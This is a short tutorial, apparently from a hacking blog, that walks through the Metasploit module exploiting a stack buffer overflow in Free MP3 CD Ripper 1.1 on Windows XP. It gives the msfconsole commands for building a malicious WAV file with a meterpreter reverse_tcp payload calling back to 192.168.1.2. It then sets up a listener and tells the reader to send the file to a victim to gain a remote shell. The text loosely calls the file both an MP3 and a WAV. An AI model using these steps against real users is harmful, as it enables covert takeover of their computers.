This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious WAV file.
MP3 CD Ripper 1.1
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/free_mp3_ripper_wav
Msf exploit (free_mp3_ripper_wav)set payload windows/meterpreter/reverse_tcp
Msf exploit (free_mp3_ripper_wav)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (free_mp3_ripper_wav)>exploit
After we successfully generate the malicious MP3, it will stored on your local computer
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
Now send your msf.wav files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
